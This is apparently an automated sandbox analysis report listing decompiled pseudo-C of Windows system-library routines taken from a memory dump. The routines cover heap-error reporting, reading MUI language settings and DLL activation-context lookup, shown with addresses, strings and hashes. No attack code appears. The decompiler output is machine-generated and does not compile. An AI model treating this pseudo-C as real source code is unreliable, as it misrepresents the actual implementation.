0x01951d0b
0x01951d17
0x01951d1f
0x01951d25
0x01951d30
0x01951d4f
0x01951d50
0x01951d32
0x01951d47
0x01951d4c
0x01951d61
0x01951d67
0x01951d68
0x01951d6e
0x01951d79
0x01951d98
0x01951d99
0x01951d7b
0x01951d90
0x01951d95
0x01951daa
0x01951db0
0x01951db1
0x01951db7
0x01951dc2
0x01951de1
0x01951de2
0x01951dc4
0x01951dd9
0x01951dde
0x01951df3
0x01951df9
0x01951dfa
0x01951e00
0x01951e0a
0x01951e13
0x01951e32
0x01951e33
0x01951e15
0x01951e2a
0x01951e2f
0x01951e39
0x01951e4a
0x01951e02
0x01951e02
0x01951e08
0x00000000
0x00000000
0x01951e08
0x01951e5b
0x01951e7a
0x01951e7b
0x01951e5d
0x01951e72
0x01951e77
0x01951e95

Strings

Error code: %d - %s, xrefs: 01951D12
HEAP[%wZ]: , xrefs: 01951C30, 01951CF7, 01951D42, 01951D8B, 01951DD4, 01951E25, 01951E6D
heap_failure_block_not_busy, xrefs: 01951CA6
Stack trace available at %p, xrefs: 01951E86
heap_failure_listentry_corruption, xrefs: 01951CD0
heap_failure_generic, xrefs: 01951C7C
heap_failure_usage_after_free, xrefs: 01951CBB
heap_failure_virtual_block_corruption, xrefs: 01951C91
heap_failure_unknown, xrefs: 01951C75
heap_failure_entry_corruption, xrefs: 01951C83
Parameter3: %p, xrefs: 01951DEE
heap_failure_cross_heap_operation, xrefs: 01951CC2
Parameter2: %p, xrefs: 01951DA5
Parameter1: %p, xrefs: 01951D5C
heap_failure_freelists_corruption, xrefs: 01951CC9
Heap error detected at %p (heap handle %p), xrefs: 01951C50
heap_failure_invalid_allocation_type, xrefs: 01951CB4
heap_failure_buffer_overrun, xrefs: 01951C98
Last known valid blocks: before - %p, after - %p, xrefs: 01951E45
HEAP: , xrefs: 01951C16, 01951C3D, 01951D04, 01951D4F, 01951D98, 01951DE1, 01951E32, 01951E7A
heap_failure_buffer_underrun, xrefs: 01951C9F
heap_failure_internal, xrefs: 01951C6E
heap_failure_multiple_entries_corruption, xrefs: 01951C8A
heap_failure_invalid_argument, xrefs: 01951CAD
heap_failure_lfh_bitmap_mismatch, xrefs: 01951CD7

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
Instruction ID: 8c9ffb38db90a38c4d9460b832dd019b6840eddf2c8da517139ec14880fa2bb6
Opcode Fuzzy Hash: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
Instruction Fuzzy Hash: 3361D432925985DFE751FB89E484F2473A4EB04B21B0E843AF90DFB311D6649A44CB1B

Uniqueness

Uniqueness Score: -1.00%

Function 018A3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E018A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E018A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E018A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E018A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E018A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E018A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L018B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E018DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E018E1370(_t276, 0x1874e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E018DBB40(0,  &_v68, _t170);
									if(L018A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E018DBB40(_t257,  &_v68, _t243);
								if(L018A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E018E1370(_t278, 0x1874e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L018B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E018DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E018E1370(_v16, 0x1874e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E018DBB40(_t262,  &_v68, _t244);
								if(L018A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E018E1370(_t282, 0x1874e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E018DBB40(_t262,  &_v68, _t201);
							if(L018A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L018B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E018DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E018E1370(_t280, 0x1874e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E018DBB40(_t267,  &_v68, _t245);
							if(L018A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E018E1370(_t284, 0x1874e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E018DBB40(_t267,  &_v68, _t224);
						if(L018A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x018a3d3c
0x018a3d42
0x018a3d44
0x018a3d46
0x018a3d49
0x018a3d4c
0x018a3d4f
0x018a3d52
0x018a3d55
0x018a3d58
0x018a3d5b
0x018a3d5f
0x018a3d61
0x018a3d66
0x018f8213
0x018f8218
0x018a4085
0x018a4088
0x018a408e
0x018a4094
0x018a409a
0x018a40a0
0x018a40a6
0x018a40a9
0x018a40af
0x018a40b6
0x018a40bd
0x018a40bd
0x018a3d83
0x018f821f
0x018f8229
0x018f8238
0x018f8238
0x018f823d
0x018f823d
0x018a3da0
0x018a3daf
0x018a3db5
0x018a3dba
0x018a3dba
0x018a3dd4
0x018a3e94
0x018a3eab
0x018a3f6d
0x018a3f84
0x018a406b
0x018a406b
0x018a406e
0x018a406e
0x018a4070
0x018a4074
0x018f8351
0x018f8351
0x018a407a
0x018a407f
0x018f835d
0x018f8370
0x018f8377
0x018f8379
0x018f837c
0x018f837c
0x018f835d
0x00000000
0x018a407f
0x018a3f8a
0x018a3f8d
0x018a3f90
0x018a3f95
0x018f830d
0x018f830f
0x018a3f9b
0x018a3fac
0x018a3fae
0x018a3fb1
0x018a3fb1
0x018a3fb6
0x018f8317
0x018f831a
0x00000000
0x018a3fbc
0x018a3fc1
0x018a3fc9
0x018a3fd7
0x018a3fda
0x018a3fdd
0x018a4021
0x018a4021
0x018a4029
0x018a4030
0x018a4044
0x018a4046
0x018a4046
0x018a4044
0x018a4049
0x018f8327
0x018f8334
0x018f8339
0x018f833c
0x018a404f
0x018a404f
0x018a404f
0x018a4051
0x018a4056
0x018a4063
0x018a4063
0x018a4068
0x00000000
0x018a4068
0x018a3fdf
0x018a3fe2
0x018a3fe4
0x018a3fe7
0x018a3fef
0x018a4003
0x018a4005
0x018a4005
0x018a400c
0x018a4013
0x018a4016
0x018a4017
0x018a401b
0x018a401e
0x00000000
0x018a401e
0x018a3fb6
0x018a3eb1
0x018a3eb4
0x018a3eb7
0x018a3ebc
0x018f82a9
0x018f82ab
0x018a3ec2
0x018a3ed3
0x018a3ed5
0x018a3ed8
0x018a3ed8
0x018a3edd
0x018f82b3
0x018f82b6
0x00000000
0x018a3ee3
0x018a3ee8
0x018a3eed
0x018a3ef0
0x018a3ef3
0x018a3f02
0x018a3f05
0x018a3f08
0x018f82c0
0x018f82c3
0x018f82c5
0x018f82c8
0x018f82d0
0x018f82e4
0x018f82e6
0x018f82e6
0x018f82ed
0x018f82f4
0x018f82f7
0x018f82f8
0x018f82fc
0x018f82ff
0x018f82ff
0x018a3f0e
0x018a3f11
0x018a3f16
0x018a3f1d
0x018a3f31
0x018f8307
0x018f8307
0x018a3f31
0x018a3f39
0x018a3f48
0x018a3f4d
0x018a3f50
0x018a3f50
0x018a3f53
0x018a3f58
0x018a3f65
0x018a3f65
0x018a3f6a
0x00000000
0x018a3f6a
0x018a3edd
0x018a3dda
0x018a3ddd
0x018a3de0
0x018a3de5
0x018f8245
0x018a3deb
0x018a3df7
0x018a3dfc
0x018a3dfe
0x018a3e01
0x018a3e01
0x018a3e06
0x018f824d
0x018f824f
0x018f8254
0x00000000
0x018a3e0c
0x018a3e11
0x018a3e16
0x018a3e19
0x018a3e29
0x018a3e2c
0x018a3e2f
0x018f825c
0x018f825f
0x018f8261
0x018f8264
0x018f826c
0x018f8280
0x018f8282
0x018f8282
0x018f8289
0x018f8290
0x018f8293
0x018f8294
0x018f8298
0x018f829b
0x018f829b
0x018a3e35
0x018a3e38
0x018a3e3d
0x018a3e44
0x018a3e58
0x018f82a3
0x018f82a3
0x018a3e58
0x018a3e60
0x018a3e6f
0x018a3e74
0x018a3e77
0x018a3e77
0x018a3e7a
0x018a3e7f
0x018a3e8c
0x018a3e8c
0x018a3e91
0x00000000
0x018a3e91

Strings

WindowsExcludedProcs, xrefs: 018A3D6F
Kernel-MUI-Language-Disallowed, xrefs: 018A3E97
Kernel-MUI-Language-Allowed, xrefs: 018A3DC0
Kernel-MUI-Language-SKU, xrefs: 018A3F70
Kernel-MUI-Number-Allowed, xrefs: 018A3D8C

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
Instruction ID: 6a1811e3cd96d4d6524b2f30269fb0554baa0e02ed2b3048cf1d2c0a57cfbdc9
Opcode Fuzzy Hash: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
Instruction Fuzzy Hash: 9FF14872D00619EBDB11DF98C980AEEBBB9FF59750F15006AEA05E7250E7749F01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 018940E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E018940E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0189B150(", passed to %s", _t29);
					}
					_push("\n");
					E0189B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1986378 = 1;
						asm("int3");
						 *0x1986378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x018940e6
0x018940e8
0x018940f1
0x018f042d
0x018f044c
0x018f0451
0x018f042f
0x018f0444
0x018f0449
0x018f045d
0x018f0466
0x018f046e
0x018f0474
0x018f0475
0x018f047a
0x018f048a
0x018f048c
0x018f0493
0x018f0494
0x018f0494
0x00000000
0x018f049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 018F043F
, passed to %s, xrefs: 018F0469
RtlAllocateHeap, xrefs: 018F0468
Invalid heap signature for heap at %p, xrefs: 018F0458
HEAP: , xrefs: 018F044C

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
Instruction ID: 10c706ca7c52b17eeb82715b0a33f8b3f0bf3799578abf41751b4c0f7031f374
Opcode Fuzzy Hash: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
Instruction Fuzzy Hash: 13012832104A419EE725976DA48DFA677A4DB12F34F2C407EF105CB752DAE8D640C621

Uniqueness

Uniqueness Score: -1.00%

Function 018BA229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E018BA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E018BDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E018D9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0195A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E018D9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0189B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E018B7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0195138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E018B7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E018B7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E018B7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E018B7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E018ED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x018ba229
0x018ba231
0x018ba23f
0x018ba242
0x018ba244
0x018ba24c
0x018ba255
0x018ba25a
0x018ba25f
0x01901c76
0x01901c78
0x01901c7e
0x01901c7f
0x01901c81
0x01901c82
0x01901c84
0x01901c89
0x01901c8b
0x01901c9e
0x01901c9e
0x01901cab
0x01901cb2
0x00000000
0x01901cb2
0x01901c8d
0x01901c92
0x00000000
0x00000000
0x01901c94
0x01901c98
0x00000000
0x00000000
0x00000000
0x01901c98
0x018ba265
0x018ba265
0x018ba266
0x018ba26f
0x018ba270
0x018ba276
0x018ba277
0x018ba279
0x018ba27e
0x018ba282
0x01901db5
0x01901dbb
0x01901dc1
0x01901dc5
0x01901de4
0x01901de9
0x01901dc7
0x01901ddc
0x01901de1
0x01901def
0x01901df3
0x01901df7
0x01901dfe
0x01901e06
0x018ba302
0x018ba308
0x018ba308
0x018ba288
0x018ba28d
0x018ba294
0x01901cc1
0x018ba29a
0x018ba29a
0x018ba29a
0x018ba29f
0x01901ccb
0x01901cd1
0x01901cd8
0x01901cea
0x01901cea
0x01901cd8
0x018ba2a9
0x018ba2af
0x018ba2bc
0x01901cfd
0x018ba2c2
0x018ba2c2
0x018ba2c2
0x018ba2c7
0x01901d07
0x01901d0d
0x01901d14
0x01901d1f
0x01901d21
0x01901d2c
0x01901d2c
0x01901d2c
0x01901d47
0x01901d47
0x01901d14
0x018ba2cd
0x018ba2d2
0x018ba2d9
0x01901d5a
0x018ba2df
0x018ba2df
0x018ba2df
0x018ba2e4
0x01901d69
0x01901d6b
0x01901d76
0x01901d76
0x01901d76
0x01901d91
0x01901d91
0x018ba2ea
0x018ba2f0
0x018ba2f5
0x01901da8
0x01901dad
0x01901dad
0x018ba2fd
0x018ba300
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01901DD7
`, xrefs: 01901C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01901DF9
HEAP: , xrefs: 01901DE4

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
Instruction ID: e63587cfd8a1de468d961eb1a77c1e6ee5d0ca8cd4cc3abb1b50e1039c7b3791
Opcode Fuzzy Hash: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
Instruction Fuzzy Hash: 3651F4322056819FE712EB6CC884FA777E8EB80B54F190568F959CB3D1D764EA40CB62

Uniqueness

Uniqueness Score: -1.00%

Function 018C8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E018C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x198d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1988464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1985780 & 0x00000003) != 0) {
							E01915510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1985780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E018DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1987984; // 0x1432b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1988464; // 0x73b80110
					 *0x198b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E018C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1985780 & 0x00000005) != 0) {
						_push(_t49);
						E01915510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x018c8e0f
0x018c8e16
0x018c8e19
0x018c8e1b
0x018c8e21
0x018c8e7f
0x018c8e85
0x01909354
0x0190936c
0x01909371
0x0190937b
0x01909381
0x01909381
0x0190937b
0x018c8e9d
0x018c8e9d
0x018c8e29
0x018c8e2c
0x018c8e38
0x018c8e3e
0x018c8e43
0x018c8eb5
0x018c8eb9
0x019092aa
0x019092af
0x019092e8
0x019092e8
0x019092af
0x018c8eb9
0x018c8e45
0x018c8e53
0x018c8e5b
0x018c8e5f
0x018c8e78
0x018c8e78
0x018c8e7d
0x018c8ec3
0x018c8ecd
0x018c8ed2
0x018c8ed2
0x018c8ec5
0x018c8ec5
0x00000000
0x018c8e7d
0x018c8e67
0x018c8ea4
0x0190931a
0x00000000
0x00000000
0x01909320
0x018c8ea4
0x018c8e70
0x01909325
0x01909340
0x01909345
0x01909345
0x018c8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

